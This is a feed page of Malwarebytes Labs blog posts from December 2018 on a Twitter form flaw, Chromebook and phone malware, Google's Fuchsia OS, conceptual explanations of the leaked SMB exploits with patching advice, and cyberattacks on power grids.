Techie Feeds

Flaw in Twitter form may have been abused by nation states

Malwarebytes - Wed, 12/19/2018 - 16:00

Twitter announced in a blog post on Monday that they discovered and addressed a security flaw on one of their support forms. The discovery was made on November 15 — more than a month ago — and was promptly fixed the next day. From the Twitter blog on this issue:

We have become aware of an issue related to one of our support forms, which is used by account holders to contact Twitter about issues with their account. This could be used to discover the country code of people’s phone numbers if they had one associated with their Twitter account, as well as whether or not their account had been locked by Twitter.

They go on to add:

Importantly, this issue did not expose full phone numbers or any other personal data. We have directly informed the people we identified as being affected. We are providing this broader notice as it is possible that other account holders we cannot identify were potentially impacted.

Country codes, take me home

While a country code isn’t treated or considered by many as sensitive information, some warn that it is enough to clue in attackers on whether a registered mobile number (with country code) is associated with a Twitter account. This means that cybercriminals could find the true country locations of Twitter users. This could be dangerous for those in countries with freedom of speech–related privacy concerns.

Twitter is currently investigating the possibility that the flaw may have been abused by potential nation-state actors, particularly from IP addresses associated with Saudi Arabia and China.

As if this weren’t enough of a headache for the social media giant, Peerzada Fawaz Ahmad Qureshi, an independent security researcher who goes by @Fawaz on Twitter, has stepped forward to disclose that he had reported the flaw to Twitter via HackerOne, a bug bounty platform, more than two years ago. Twitter took no action, however, deeming the bug as non-critical before marking the report an “informative” one.

Wait! That’s not all

This announcement comes hot on the heels of a Trend Micro report about malicious Twitter users abusing the social media platform to stealthily communicate with malware using stenography, the method of hiding messages in images. In this case, the malicious actors have hidden commands in memes found in every nook and cranny of Twitter—hiding-in-plain-sight at its finest.

This isn’t the first time Twitter has been used as a comms hub for malware. Back in 2009, a DIY botnet kit was discovered that brought social media–controlled infection hijinks to the masses, allowing malware authors with rudimentary skills to use Twitter to send commands.

Stock, drop, and roll

Outside of bot action, the news of Twitter’s investigation triggered a dramatic drop in the company’s stock share prices. It promises to be a rollercoaster-ride ending to 2018 for those trying to keep both Twitter and its users safe from harm.

If you use the social media platform and are worried about potential breach, Twitter’s advice is simply: do nothing. While these mishaps may have been close calls instead of direct hits, one hopes that in 2019, we’ll all be a little more proactive—and a lot more reassured—about using our favorite portals and communication channels safely.

The post Flaw in Twitter form may have been abused by nation states appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Yes, Chromebooks can and do get infected

Malwarebytes - Wed, 12/19/2018 - 15:00

As a Mac malware specialist, I’ve seen more than my share of folks saying “Macs don’t get viruses” over the years. I’ve seen and experienced first-hand that this isn’t true—even on iOS, where despite having tight, built-in security, iPhones are still capable of getting infected by rare malware. I suppose that I shouldn’t be surprised, then, when I hear someone claim that “viruses on Chrome OS don’t exist.”

Although it’s certainly true that viruses—the class of malware that spreads itself by injecting malicious code into other processes—really don’t exist to a significant degree these days, even on Windows, it’s definitely not true that any platform is impervious to malware. Chromebooks are no exception.

No admin permissions, no problem, right?

Despite popular belief, Chromebooks don’t actually run Android. They run a system called Chrome OS, where all Android apps are run in emulation. There are certainly some security improvements in Chrome OS over Android. For example, the powerful device administrator permissions on Android are unavailable on Chrome OS, limiting the amount of “bad” that malware can do.

So, if malware can’t get those permissions, it’s not serious, right? Wrong!

If I had a dime for every time I heard someone minimize some new piece of Mac malware because it couldn’t get root permissions, I’d be able to take my wife out to a nice dinner. But these permissions aren’t always relevant. Bad guys can get away with a lot of bad stuff, including stealing user data, phishing for passwords, hijacking CPU power for the purpose of a botnet or cryptomining, and more, all without admin permissions. The same is true on Chrome OS.

Android malware = Chromebooks malware

Let’s take a look at a few examples of Android malware that would work perfectly well on Chrome OS, as they don’t require anything Chrome OS doesn’t provide.

First, consider the Buzzfeed story of apps from Chinese companies that engaged in ad fraud. These apps didn’t require anything more than permission to access a number of different bits of user data. Admittedly, there was no legitimate reason those apps had to access some of that data, but when installing a new app, people are prone to click past any requests just to get the app working.

These apps don’t really do much harm to the user, of course. The primary target of the fraud are the advertising networks. But that doesn’t make it okay, and any time an app like this is “wildly over-permissioned,” as the Buzzfeed article puts it, there’s the chance of an update to the app resulting in more malicious behavior.

Image credit: Buzzfeed

A more malicious example comes in the form of some malicious cryptocurrency wallet apps found on Google Play. These apps would not require any particular device permissions, as their sole purpose is to trick the user into storing cryptocurrency in the fake wallets supported by these apps. In reality, any cryptocurrency stored cannot be withdrawn later. The perpetrator essentially stole money from the victims—and they could easily do the same to Chromebook users.

Image credit: Lukas Stefanko

Of course, affected users would have to be using cryptocurrency, so one could argue that they’d be more tech-savvy and less likely to fall for such scams. That’s not necessarily the case, but okay, let’s take a look at another example.

Consider the threat from fake antivirus software. This is software that poses as an antivirus, but provides none of the actual benefits. As described on our own blog, a family of fake antivirus software has been floating around since 2013. At one point, it was charging users $1.99 for the privilege of scanning the device, but covered up the fact that this was $1.99 per week!

This is the kind of scam many people routinely fall for and it’s universal—device, OS, and platform agnostic. Any major computer system will be afflicted with this scourge, with the exception of iOS, and even that was once plagued by fake antivirus scams. (In fact, that’s the only kind that could exist on iOS, due to the impossibility of scanning the system in any way.) If I had a dime for every person I’ve encountered who has been tricked out of their money by scammers like these, I’d have enough to take my wife out for dinner and a show!

Mac and Chrome OS parallels

For a long time, people have said that Macs don’t get viruses. People have also said that the Mac App Store is the safest place to download apps. The same has been said of Chrome OS. Unfortunately, neither is actually true. Apps from the Mac App Store are sandboxed, just like the ones from Google Play on Chrome OS.

That hasn’t stopped criminals from making lots of money off the Mac App Store, however. I’ve documented many Mac App Store apps over the last few years that have defrauded users in a variety of ways. None of them have required root permissions, or exploits, or any other advanced malware techniques. Yet they have stolen user data and scammed users out of their money. I’ve worked hard to identify these apps, ensure that they are detected by Malwarebytes for Mac, and get them removed from the App Store when possible.

There should be no false illusions that Chrome OS is any different; it is not. The same tricks that are so successful on macOS can be equally effective on Chrome OS, and Malwarebytes has top-notch mobile malware researchers who work hard every day to keep Android and Chromebook users safe from such threats.

But does my Chromebook really need antivirus?

Since there is, definitively, already malware that can affect Chromebooks, it’s reasonable to install antivirus software on a Chromebook. And since Chromebooks are increasing in popularity, it’s also reasonable to assume cybercriminals will continue to develop more malware to get their piece of the pie. Once Pandora’s Box has been opened for a device, operating system, browser, or other platforms, we’ve never once seen the bad guys back away from it.

However, there is a catch to all of this. And to discover the catch, you must first answer this question: Does your Chromebook support Google Play?

Not all Chromebooks do. If yours does not, it cannot download malware through Google Play, much less third-party app stores, because it cannot download any apps at all. In such a case, you could use the free Malwarebytes browser extension beta for protection against browser-based attacks such as phishing or malicious websites and tech support scams, and that would be the most security you’d need (at the moment).

For those with Google Play, sure, you could simply try being careful about what you download. However, anyone can potentially be tricked by just the right malicious app with a large number of fake 5-star ratings, or just the right scam. If that concerns you, Malwarebytes for Android (and Chrome OS) is here to help.

The post Yes, Chromebooks can and do get infected appeared first on Malwarebytes Labs.

Categories: Techie Feeds

All the reasons why cybercriminals want to hack your phone

Malwarebytes - Tue, 12/18/2018 - 16:00

When people think of hacking, most imagine desktop computers, laptops, or perhaps even security cameras. However, in recent years, cybercriminals have expanded their repertoire to include smartphones, too. Here are 10 reasons why they may be looking to hack your phone.

1. To infect it with malware

Many smartphone users assume they can stay safe from malware and other threats by installing antivirus apps on their phones and being extra careful about the websites they visit. They typically don’t expect their phones to have malware out of the box. However, researchers showed that’s what happened with more than three dozen Android models, typically from lesser-known brands.

The phones had Trojan malware installed on them before they reached users, and the culprit appeared to be a software vendor in Shanghai that was a shared reseller for a brand of antivirus software. Although it’s not clear what the hackers wanted to do after infecting the phones, the malware was particularly hard to remove. Often, it involved fully reinstalling the operating system.

2. To eavesdrop on calls

People use their phones to speak to loved ones, discuss business plans, talk about their travels—all manner of personal, intimate content. So, it’s not surprising that criminals would want to break in and listen, whether to case a target or simply for voyeuristic pleasure. But how do they do it?

There’s a flaw in US cellular exchange, the vulnerability known as SS7, which allows hackers to listen to calls, read texts, and see users’ locations after learning their phone numbers. Even though US agencies know about the issue, they haven’t taken decisive action to fix it, leaving Americans’ phone privacy at risk.

3. To steal money

Ransomware attacks cause headaches for computer users by making the affected machines lock up or holding files hostage until people pay the ransom to restore access. Even then, paying doesn’t guarantee a return to proper functionality. Ransomware doesn’t only affect computers, though. There’s a recent trend of mobile ransomware, which often originates from malicious, third-party apps.

In one example, a third-party app promised to optimize the Android system but actually tricked people into transferring $1,000 from their PayPal accounts. The login process was legitimate, so it wasn’t a phishing attempt. However, once people logged in, a Trojan automated the PayPal transfer.

4. To blackmail people

The crime of blackmail isn’t new, but threat actors recognize that the small computer in people’s pockets and purses likely has more personal information stored in it than a desktop or laptop. And they are able to first cut people off from accessing their phones before then threatening to leak the information they find.

Criminals may start the hack after obtaining some personal information from a victim that available on the black market due to a previous, unrelated breach. They then use that information to contact the victim’s phone company and pose as the user, saying that they want to transfer the number to a new phone. Phone companies often provide such services and can automatically transfer information, including phone numbers, to a new device. The trouble is that in this case, the old phone still works but it’s useless to the person who owns it.

After hackers take over a phone in this way, the stage is set for more serious crimes—blackmail among them. If a person had essential numbers in their phone not backed up elsewhere, they could easily feel pressured to cave into hackers’ demands to avoid worse consequences.

5. To damage your phone

Hackers feel they’ve accomplished a goal by causing chaos for victims. One way to do that is to make the phone overheat and ultimately ruin it. Security researchers warned that hackers could break into a phone’s processor and use it for mining cryptocurrency. In addition to making the phone slow down, it can also cause the phone to get too hot or even blow up!

There are many reliable cooling devices used in cell phones for temperature management, even “intelligent” temperature management solutions that heat up your phone’s battery when it’s too cool and cool it down when it’s too hot. However, if hackers have their way, even those normally sufficient internal components could fail to keep the device cool enough.

One type of the cryptomining malware called Loapi is often hidden in apps that appear as downloadable games. Security researchers ran a test and found it actually made a phone battery bulge due to excessive heat after only two days.

6. To threaten national security

Countless analysts have chimed in to say that President Trump’s alleged use of insecure mobile devices could help foreign adversaries glean information about the United States that could threaten the nation or at least give information about the president’s intended actions.

In 2018, Billy Long, a Republican congressman, had his mobile phone and Twitter account hacked. Cybercriminals know that one of the primary ways politicians interact with followers is through social media.

Besides threatening national security more directly, these hackers could erode the trust politicians have built with their audiences, especially with fake posts that seem to come from the genuine account owners.

Cybercriminals know that by hacking the mobile phones and social media accounts of politicians, they are contributing to the overall public opinion that politicians cannot be trusted. Instead of looking to the source for information, users might instead look for news via sources that are even less reliable or strategically crafted to spread fake news.

7. For fun or notoriety

Some hackers get a thrill by successfully pulling off their attacks. Hacking is a source of entertainment for them, as well as an ego boost. If money isn’t the primary motivator for cybercriminals, then notoriety is might be a close second. Hackers may get into phones because it’s a newer challenge that might require more cutting-edge malware development techniques. Ultimately, many cybercriminals want approval from others in the industry and desire their respect.

8. To get payment information

E-wallets, which store payment information inside smartphone apps so people don’t have to carry real credit or debit cards, are convenient. However, their rising popularity has given hackers another reason to target phones.

Often, cybercriminals entice people to download fake mobile payment apps (of course believing they are real). Then, once people enter their payment information, hackers have the information needed to charge transactions to the cards.

9. Because so many people use it

Since hackers want their attacks to have significant payoffs, they know they can up their chances of having a major impact by targeting smartphones. Information published by the Pew Research Center shows 95 percent of Americans own smartphones. To put that in perspective, only 35 percent of the population did in 2011, when the organization first conducted a survey on smartphone ownership.

Also, different research from another organization reveals that mobile Internet usage is overtaking desktop time. People are becoming increasingly comfortable with using their smartphones to go online, browse, and even shop. As such, no matter what kind of hack cybercriminals orchestrate, they can find plenty of victims by focusing on smartphone users.

10. Because it’s an easy target

Research shows that mobile apps have rampant security problems. This gives criminals ample opportunity to infiltrate insecure apps rather than the phones themselves.

In one case, about 40 of the top 50 shopping apps had at least a few high-level security vulnerabilities that allowed hackers to see personal information or deceive users by luring them to dangerous apps that were copies of the originals.

Further research about problematic dating apps found that many of them give third parties access to unencrypted data through vulnerable software development kits (SDKs). Hackers know some apps achieve hundreds of thousands, or even millions. of downloads. If they can break into them, they’ll get fast access to the phones that have those apps installed and the people who use them.

How to stay protected

These examples show that hackers have a myriad of reasons to hack phones and even more ways to make it happen. One easy way to protect against attacks is to avoid third-party app stores and only download content from the phone’s legitimate app stores, such as Google Play or iTunes. However, threat actors can penetrate those platforms, too, and many an infected or rogue app has made its way through.

It’s also smart to keep tabs on phone statistics, such as battery life and the number of running apps. If those deviate too much from the norm, that’s a sign hackers may be up to no good in the background.

Running a mobile antivirus scan at least monthly, or installing an always-on cybersecurity program is another good strategy, but only if the application comes from a trustworthy source, such as the vendor’s official site.

Instead of being overeager to download new apps, people should ideally exercise caution and only do so if numerous sources of feedback indicate they are free from major security flaws. Some app development companies are in such a hurry to get to the market with their latest offerings that they do not make security a priority.

Besides these more specific tips, it’s essential for people to be highly aware of how they interact with their phones. For example, strange pop-ups or redirects in a phone’s browser, or random icons appearing without having downloaded a new app could indicate problems, and individuals should not assume that everything’s okay. When in doubt, it’s best to stop using the phone and get some answers—before hackers learn all they need to know about you.

The post All the reasons why cybercriminals want to hack your phone appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mobile Menace Monday: Is Fuchsia OS the end of Android?

Malwarebytes - Mon, 12/17/2018 - 20:10

It’s no secret that every year Google announces a new Android version. This time though, recent Google documents state that the next major Android version will be Android Q and not Android 9.1 Pie.

In parallel, Google is also developing an operating system called Fuchsia that’s supposedly going to replace Android in the near future. People were expecting to see a statement from Google about Fuchsia, or Andromeda (its previous codename), back in October 2017. But that never happened. Instead, we get to speculate for another year about whether or not it’s here to replace Android, or is simply a playground for developers. Here’s what we know so far.

A brief history of Google Fuchsia

Fuchsia is a capability-based operating system with user interface, and it has the ability to scale up to larger devices like laptops and computers. Also, it can support ARM, MIPS, and x86 processors.

It first popped up on GitHub in August 2016 with zero fanfare or explanation from Google. Unlike Android and Chrome OS, Google Fuchsia is not based on Linux, but rather Google’s own new microkernel.

In May 2017, an experimental OS leaked. However, it calling it an “OS” might be a misnomer. Basically, its system UI was up and running on top of Android and functioning like an app, but nothing else worked. Later, one of the developers working on the project teased that this was not just a dumping ground but a real project. This led to speculation that Google had larger plans for it.

Not long after, at the beginning of 2018, Google released news that the Fuchsia team picked the Chrome OS-powered Google Pixelbook as a supported device. A couple of curious users rushed out to test this claim. They confirmed that they were able to run Fuchsia on these Google Pixelbooks. This was one more big step forward. Since then, we’ve heard nothing more. However, we do know the components of Fuchsia, and they look promising.

The Fuchsia layer cake

Let’s take a closer look under the hood of this potential future Google OS. There are four distinct layers that hold the whole operating system together. Google uses a layer cake model when describing the organization of Fuchsia code, and we will not deviate from this scheme. So, let’s talk about each layer separately and in detail.


It all starts with Zircon(formerly Magenta), the Fuchsia Operating System’s new microkernel, which is based on LK (Little Kernel), a small operating system intended for embedded devices. Zircon operates as a foundation on which the Fuchsia house foundation is built, and it primarily handles access to hardware and communication between software.


The next layer, which sits atop Zircon, is called Garnet. Garnet consists of services needed for the OS, such as its network and graphics, together with the package manager and device drivers. Some of them worth mentioning here: Escher, a Vulkan-based graphics renderer with specific support for Volumetric soft shadows; Amber, Fuchsia’s update system; and Xi Editor,  modern editor with a backend written in Rust.


The next layer up, Peridot, mostly handles Fuchsia’s modular runtime app design for composition. What this means is almost everything that exists in Fuchsia, such as software and even system files, are in packages. And Fuchsia packages can be made up of smaller components instead of large, all-in-one programs. One of the major components of Peridot is Ledger. Ledger is a storage system for Fuchsia, and it provides and manages separate data stores for apps/components across devices, syncing everything through a cloud provider.


Topaz is the top layer and the one you’ll mostly likely interact with. It’s similar to Android’s pre-installed (factory) applications like messaging, contacts, phone, camera, and music. The most important part is the introduction of Flutter support. Flutter is a software development kit allowing cross-platform development abilities for Fuchsia, Android, and iOS. Flutter produces apps based on Dart, an open-source, scalable programming language with robust libraries and runtimes for building web, server, and mobile apps. Due to the Flutter software development kit offering cross-platform opportunities, users are able to install parts of Fuchsia on Android devices.

In addition, Google already announced Flutter 1.0 is out. The first stable release of Google’s UI toolkit for creating native experiences for iOS and Android from a single codebase is available at

Final thoughts

Let’s sum it up. Here’s what we know so far:

  • Google Fuchsia is a new OS in development from Google, but is still a ways off from completion.
  • The OS is based on the Zirkon kernel, which makes it highly scalable and secure.
  • Flutter, a software development kit offering cross-platform opportunities, is already out.

Although Google said Fuchsia is just “one of many experimental open-source projects” at the company, we can already see a potential OS brewing that could replace Android. Microsoft once tried to create something similar with the code name Singularity, but they totally failed. That’s why there’s a big question mark if Fuchsia will actually replace Android and Chrome OS, or putter out like some of its predecessors.

Also, let’s remember that Android was hanging around for about five years before it launched in a real product. If Fuchsia follows a similar path, and everything goes well, maybe we can expect a consumer product sometime around 2020. Right now, it’s still a giant maybe. So if you’re feeling stressed about learning a new OS, there is still plenty of time to adjust—save the panicking for later in 2019.

The post Mobile Menace Monday: Is Fuchsia OS the end of Android? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (December 10 – 16)

Malwarebytes - Mon, 12/17/2018 - 17:58

Last week on Labs, we took a look at some new Mac malware, a collection of various scraped data dumps, the protection of power grids, and how bad actors are using SMB vulnerabilities

Other cybersecurity news
  • Millions affected by Facebook photo API bug: An issue granted third-party apps more access to photos than should normally be granted, including images uploaded but not published. (source: Facebook)
  • Bomb threats may be a hoax: An email in circulation urging ransom payments in Bitcoin lest bombs across the US be detonated may well be a fake, according to US law enforcement. (source: The Register)
  • Man jailed for fraud offenses: A man in the UK has been jailed for taking part in fraudulent activities. The main point of interest is surely the spectacular device he built. (source: Met Police)
  • Another Google Plus bug: For six days, developers were able to access profile data not made public by the users. (source: Google)
  • Windows 10 data collection: Reddit users complained Windows 10 is grabbing a certain kind of data even with the setting disabled. (source: How to Geek)
  • Taylor Swift concert tracks stalkers with facial recognition software: At a recent event, cutting-edge tech was deployed to ensure the crowds were free of potential troublemakers. (Source: Rolling Stone)
  • Password disasters of 2018: A tongue in cheek look at some of the more spectacular password mishaps seen rumbling into view this year. (Source: Help Net Security)
  • Android Trojan steals from PayPal accounts: Even with 2FA enabled, it might not be enough to keep your account balance safe. (Source: ESET)
  • Character recognition collects URLs in YouTube videos: Theoretically private data in hidden videos may not be as private as you’d first hoped. (Source: Austin Burk’s blog)
  • Traveller data left lying around on USB sticks: Border Agents aren’t being quite as careful as they should be where potentially sensitive passenger data is concerned. (Source: Naked Security)

Stay safe, everyone!

The post A week in security (December 10 – 16) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How threat actors are using SMB vulnerabilities

Malwarebytes - Fri, 12/14/2018 - 16:00

Some of the most devastating ransomware and Trojan malware variants depend on vulnerabilities in the Windows Server Message Block (SMB) to propagate through an organization’s network. Windows SMB is a protocol used by PCs for file and printer sharing, as well as for access to remote services.

A patch was released by Microsoft for SMB vulnerabilities in March 2017, but many organizations and home users have still not applied it. So now, the unpatched systems allow threats that take advantage of these vulnerabilities inside, helping active malware campaigns spread like Californian wildfire.

SMB vulnerabilities have been so successful for threat actors that they’ve been used in some of the most visible ransomware outbreaks and sophisticated Trojan attacks of the last two years. In fact, our product telemetry has recorded 5,315 detections of Emotet and 6,222 of TrickBot in business networks—two Trojan variants that are using the SMB vulnerabilities—in the last 30 days alone.

What makes them so effective?

What makes some malware so widespread is the way in which it propagates. While massive spam campaigns only render a few victims that actually pay off, a worm-like infection that keeps spreading itself requires little effort for multiplying returns. And that’s exactly what the SMB vulnerabilities allow their payloads to do: spread laterally through connected systems.

For example, WannaCry ransomware (also known as WannaCrypt), which used one of the SMB vulnerabilities, was launched in May 2017, yet the infection continues to expand. Below is the graph that shows our telemetry for Ransom.WannaCrypt for the month of November 2018.

It’s been more than 1.5 years, and WannaCry continues to proliferate, thanks to the sheer number of unpatched machines connected to infected networks.

How did this come about?

At the moment, there are three exploits in the wild that use SMB vulnerabilities. These exploits have been dubbed EternalBlue (used by WannaCry and Emotet), EternalRomance (NotPetya, Bad Rabbit, and TrickBot), and EternalChampion. There is a fourth exploit called EternalSynergy, but we have only seen a Proof of Concept (PoC)—nothing has appeared yet in the wild.

All these exploits were leaked by the ShadowBrokers Group, who allegedly stole them from the NSA. Less then a month after ShadowBrokers published their “findings,” the first fully functional malware that used the EternalBlue exploit, WannaCry, was found in the wild.

Since then, multiple large-scale malware attacks have relied on the SMB vulnerabilities to penetrate organizations’ networks, including the NotPetya and Bad Rabbit ransomware campaigns in 2017, and now the Emotet and TrickBot Trojan attacks, which have been ongoing through the third and fourth quarter of 2018.

Let’s now take a closer, more technical look at each exploit and how they work.


A bug in the process of converting File Extended Attributes (FEA) from OS2 structure to NT structure by the Windows SMB implementation can lead to a buffer overflow in the non-paged kernel pool. This non-paged pool consists of virtual memory addresses that are guaranteed to reside in physical memory for as long as the corresponding kernel objects are allocated.

A buffer overflow is a programming flaw that lets the data written to a reserved memory area (the buffer) go outside of bounds (overflow), allowing it to write data to adjacent memory locations. This means attackers are able to control the content of certain memory locations that they should not be able to access, which attackers then exploit to their advantage. In the case of EternalBlue, they are able to control the content of a heap that has execution permission, which leads to the Remote Code Execution (RCE) vulnerability, or the ability to execute commands on a target machine over the network.


Eternal Romance is an RCE attack that exploits CVE-2017-0145 against the legacy SMBv1 file-sharing protocol. Please note that file sharing over SMB is normally used only on local networks, and the SMB ports are typically blocked from the Internet by a firewall. However, if an attacker has access to a vulnerable endpoint running SMB, the ability to run arbitrary code in kernel context from a remote location is a serious compromise.

At the core of this exploit is a type confusion vulnerability. Type confusion vulnerabilities are programming flaws that happen when a piece of code doesn’t verify the type of object that is passed to it before using it. Type confusion can allow an attacker to feed function pointers or data into the wrong piece of code. In some cases, this can lead to code execution.

In other cases, type confusion vulnerability leads to an arbitrary heap write, or heap spray. Heap spraying is a method typically used in exploits that places large amounts of code in a memory location that the attacker expects to be read. Usually, these bits of code point to the start of the actual code that the exploit wants to run in order to compromise the system that is under attack.

After the spray has finished, the exploit uses an info leak in a TRANS_PEEK_NMPIPE transaction. It uses the info leak to determine whether the target is running a 32- or 64-bit version of Windows and to get kernel pointers for various SMB objects.


The issue exploited by EternalChampion is a race condition in how SMBv1 handles transactions. A race condition, or race hazard, is the behavior of a system where the output depends on the sequence or timing of other uncontrollable events. It becomes a bug when events do not happen in the order the programmer intended. Sometimes these bugs can be exploited when the outcome is predictable and works to the attackers’ advantage.

Meanwhile, a transaction is a type of request that can potentially span multiple packets. For example, if a request is too large to fit in a single server message block (SMB), a transaction of the appropriate size can be created, and this will store the data as it is received from multiple SMBs.

This vulnerability is exploited in two ways: first for an information leak, and second for remote code execution. The bug is first exploited to leak pool information via an out-of-bounds read. To do this, a single packet containing multiple SMBs is sent to the server. This packet contains three relevant pieces:

  • A primary transaction request that will immediately be executed.
  • A secondary transaction request that triggers the bug caused by the race condition.
  • Sets of primary transactions that heap spray the pool with the intention to place a transaction structure immediately behind the one that tracks the first primary transaction request.

First, a transaction is created that contains the shellcode. This does not start the exploit, it just contains the second stage payload. Next, a packet is sent that contains multiple SMBs. The packet contains all expected transaction data and immediately begins execution.

The secondary transaction handler copies the secondary transaction request’s data if it fits in the buffer. Except due to the race condition, the pointer now points to the stack of the primary transaction request handlers’ thread (as opposed to the expected pool buffer). This allows an attacker to write their data directly to the stack of another thread.

The attacker has control over the displacement, so they can choose the amount of data to copy and then copy it. This allows them to precisely overwrite a return address stored on the stack of the primary transaction request handler’s thread, and results in the ability for Remote Code Execution.


The Proof of Concept for EternalSynergy shows that incoming SMB messages are copied by an initial handler into the corresponding transaction buffer. But the handler automatically assumes that the provided address is the beginning of the buffer. However, during a write transaction, the same address is automatically assumed to be the end of the existing data, and the address pointing to the beginning of the buffer is updated accordingly.

This means that an attacker can construct a secondary message in the transaction to point beyond the start of the buffer, resulting in a buffer overflow during the copy action.


Looking for information about these SMB exploits, you may also run into an exploit called EternalRocks. EternalRocks was not included in the ShadowBrokers release, but was instead constructed and discovered later. EternalRocks uses seven NSA tools where, for example, WannaCry only used two (EternalBlue and another called DoublePulsar).

Prevention and remediation

Despite the significant power SMB vulnerabilities afford to attackers, there is one simple remedy to prevent them from ever becoming problematic.

Patch your systems.

The Windows Operating Systems vulnerable to the attacks found in the wild all predate Windows 10. Most attacks work only on Windows 7 and earlier, and Microsoft released patches for the vulnerabilities that were leaked under the Microsoft Security Bulletin MS17-010. This leaves little-to-no reason for networks to be vulnerable to these attacks, yet the number of current victims is overwhelming.

By applying the patch released by Microsoft in 2017, all your eternal headaches can magically disappear. And for extra measure, we also recommend you patch and update all systems, browsers, and software as soon as possible to shore up any other potential vulnerabilities in the network.

In addition, many cybersecurity solutions, including Malwarebytes Endpoint Protection, offer innovative anti-exploit technology that can block threats such as EternalBlue from ever dropping their payloads and infecting systems.

For example, Malwarebytes’ anti-exploit module detected WannaCry as Ransom.WannaCrypt right from the start. Below, we created a heat map using our telemetry, showing where the infection started and how fast it spread across the globe.

It is for good reason that most cybersecurity guides advise users to patch quickly and keep systems updated. So many of the infections seen today could be avoided with consistent monitoring and basic computer maintenance. Unfortunately, a lot of businesses believe they do not have the time or manpower to follow this advice. But when companies leave their networks unprotected, they compromise the integrity of all of our online experiences—especially when SMB vulnerabilities allow infections to spread so quickly.

Don’t be one of those companies. Get protected and stay updated!

The post How threat actors are using SMB vulnerabilities appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Compromising vital infrastructure: the power grid

Malwarebytes - Thu, 12/13/2018 - 16:00

Where were you when the lights went out? That line became famous after the 1977 blackout in New York City. This power outage was caused by lightning and lasted for up to two days, depending on which part of New York you lived in. While in this case the power grid failure was a freak incident due to faulty backup equipment, it is still famous for the havoc it wreaked throughout the city—including looting and arson—during a time when national morale was already low.

Now imagine something similar happening today. Would it result in the same criminal chaos? My guess is it would depend on the circumstances and how much time it takes to restore power. Let’s hope we never find out.

Power grid hardware

The underlying hardware of the power grid has gone through a lot of improvements since 1977. And so have backup systems and procedures.

In many countries, a power interruption that lasts longer than a given threshold gives the consumer the right to claim damages from the power company. These damages are to be paid by the electricity distributor. The amount of the customer compensation and the threshold can be vary from one country to another, but you can usually look them up on the website of your provider.

This is not to say that it’s impossible to do physical damage if an attacker is determined enough, as the 2013 sniper attack on a California energy grid substation demonstrated.

Recent regulations and improvements have made it rare to experience power outages of more than a few hours in the western world—unless there are special circumstances, such as natural disasters. Tornadoes, hurricanes, earthquakes, erupting volcanoes, flooding, and wildfires can cause power outages, which makes dealing with those disasters even more difficult. Any other power outages are usually restored quickly or covered by backup systems.


We are aware of several malware variants that are used against power supplies, and some of them can be held responsible for major power outages around the globe.

Stuxnet is a worm designed to spread through Windows systems and go after certain programmable controllers by seeking out the software related to these controllers. Stuxnet is believed to be specifically designed to destroy the Iranian nuclear program, but it can also be used to bring down power plants.

A group of hackers dubbed Sandworm and suspected to be based in Russia shut down the Ukrainian power grid in December 2015 using a malware called BlackEnergy. The malware opened a backdoor that allowed the attackers to control infected machines to a level where they were able to cross over into the operational network. Once there, they started to flip switches, disabling IT infrastructure and deleting files. Earlier in 2014, the US government reported that hackers had planted BlackEnergy on the networks of American power and water utilities, but nothing came of it.

If any countermeasures were taken in the Ukraine, they turned out to be insufficient or at least unable to withstand CrashOverRide. CrashOverRide, aka Industroyer, is an adaptable malware that can automate and orchestrate mass power outages. The power grid–sabotaging malware was likely the one they used in the December 2016 cyberattack against Ukrainian electric utility Ukrenergo. The CrashOverRide malware can control legacy electricity substations’ switches and circuit breakers, allowing an attacker to simply turn off power distribution, leading to cascading failures and causing more severe damage to equipment.

Dragonfly, aka Energetic Bear, is a malware campaign that uses a variety of infection vectors in an effort to gain access to a victim’s network, including malicious emails, watering hole attacks, and Trojanized software. Part of this campaign was a malicious email disguised as an invitation to a New Year’s Eve party to targets in the energy sector in December 2015.

Sandworm malware, discovered in 2014, uses a vulnerability to launch external files from a malicious Powerpoint file. In a Sandworm attack, the malicious Powerpoint file pulls in two files from a remote server that combine to deliver the malware payload. Sandworm has been used in targeted attacks against NATO, the European Union, and companies in the telecommunications and energy sectors.

Backup systems

It may seem obvious to point out that critical systems like hospitals should have independent emergency power backup systems. And most of them do. But are they tested regularly for functionality? Do they have enough supplies to last during a prolonged power outage? Is there an option to turn them on manually if they fail to kick in automatically? And is someone available on premise who knows how to do this?

Emergency power systems come in many shapes and sizes. Standby generators are probably the most well-known, and they rely on some kind of fuel to provide emergency power. Batteries, for example, use stored power and release this power when it’s needed. But batteries are generally only a solution for hours rather than days, and they tend to lose some power even when they are not in use. It is imperative to find a backup solution that is robust enough to meet your needs in a worst-case scenario.

Energy sources

Theoretically, there are other ways to frustrate the power grid. For example, by cutting off the resources we use to run the power plant, such as coal, water, wind, solar, nuclear, and natural gas. This is a good reason to use a wide variety of resources, and another excellent reason to use renewable energy. There is also good reason why OPEC has a lot of influence in the world of today.

To show that hacking into power supplies is not entirely theoretical, we want to mention that Iranian hackers infiltrated the control system of a small dam less than 20 miles from New York City in 2013. Unfortunately, many power plants are still accessible from the Internet in unnecessary ways that endanger their cybersecurity.


Criminals have tools at their disposal with the capability to cause serious damage to the power grid. Therefore, the power industry must take precautions and upgrade cybersecurity to keep their systems safe. And they should do more than just abide by the minimum-security standard. Power grid exploitation companies and their suppliers should have themselves tested on their ability to withstand cyberattacks on a regular basis.

This is especially true for nuclear power plants, where a loss of control can have more catastrophic consequences than just the loss of power output. Since 9/11, every company operating nuclear power plants has had an NRC-approved cybersecurity program in place, but cybersecurity was not such an issue when these plants were designed.

Besides cybersecurity, there are physical measures a government could enforce to improve the stability of a stressed power grid. As Joshua Pearce, a professor of electrical and computer engineering at Michigan Technological University, put it:

If we want to have a secure grid and go full throttle on renewable energy, what it means is we need to break up the grid into a bunch of microgrids that still act together as a full grid, so that we still have all the benefits that we have today with our giant centralized grid while still having the security.

In an attack, such a microgrid could be taken out without having an ill effect on all the other microgrids—which would make a successful attack less disastrous.

It would also stand to reason to take heed of the advice of Energy Secretary Rick Perry, who told lawmakers at an appropriations hearing that cyberattacks are literally happening hundreds of thousands of times a day. He warned that the Department of Energy needs an office of cybersecurity and emergency response in order to be prepared for threats like this in the future. And looking at what’s already taken place, plus what is vulnerable to attack: We have to agree.

The post Compromising vital infrastructure: the power grid appeared first on Malwarebytes Labs.

Categories: Techie Feeds

